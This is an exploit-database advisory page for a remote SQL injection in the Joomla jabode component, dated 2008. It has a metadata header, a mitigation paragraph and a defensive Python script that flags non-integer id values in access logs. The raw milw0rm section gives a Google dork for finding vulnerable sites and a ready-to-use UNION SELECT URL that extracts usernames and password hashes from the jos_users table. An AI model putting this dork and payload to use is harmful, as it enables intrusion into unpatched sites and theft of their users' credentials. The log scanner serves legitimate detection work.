vendor: Joomla Component jabode
by: His0k4
CVSS: 7.5 HIGH
Remote SQL injection
CWE: 89
Product Name: Joomla Component jabode
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Joomla Component jabode Remote SQL injection

This exploit allows an attacker to perform a remote SQL injection attack in the Joomla Component jabode. The vulnerability can be exploited by sending a specially crafted request to the target Joomla website, which can lead to unauthorized access or disclosure of sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Joomla Component jabode or apply any available patches. Additionally, website administrators should regularly monitor their websites for any unauthorized access or suspicious activities.
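
The monitoring recommended above can be made concrete for this component. The following added example (not part of the original advisory or of the jabode component) scans web-server access-log lines for com_jabode requests whose id parameter is not a plain integer; the log lines are constructed samples, and the rule that a legitimate id is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jun/2008:10:00:01 +0000] "GET /index.php?option=com_jabode&task=sign&sign=taurus&id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Jun/2008:10:00:07 +0000] "GET /index.php?option=com_jabode&task=sign&sign=leo&id=-2%20UNION%20SELECT%20user()-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [28/Jun/2008:10:00:09 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [28/Jun/2008:10:01:00 +0000] "GET /index.php?option=com_jabode&task=sign&sign=aries&id=5&id=5%27 HTTP/1.1" 200 812',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id value is a non-negative integer.
INT_RE = re.compile(r'[0-9]+')


def suspicious_jabode_requests(lines):
    """Return (client, decoded id value) for com_jabode requests with a non-integer id."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jabode" not in params.get("option", []):
            continue  # other components are out of scope for this check
        # Check every id value: a repeated parameter can hide a bad value
        # behind a clean one.
        for value in params.get("id", []):
            if not INT_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_jabode_requests(SAMPLE_LOG):
        print(f"{client}\tid={value!r}")
```

The same integer-only rule is what the component would need to enforce on id before using it in a query, so a hit in the logs marks a request that a patched component should have rejected.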

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component jabode Remote SQL injection            \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_jabode

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--

[*] Funny note:  You can change "taurus" to your sign for best results xd...

                
----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://www.dz-secure.com
                 http://palcastle.org/cc

# milw0rm.com [2008-06-28]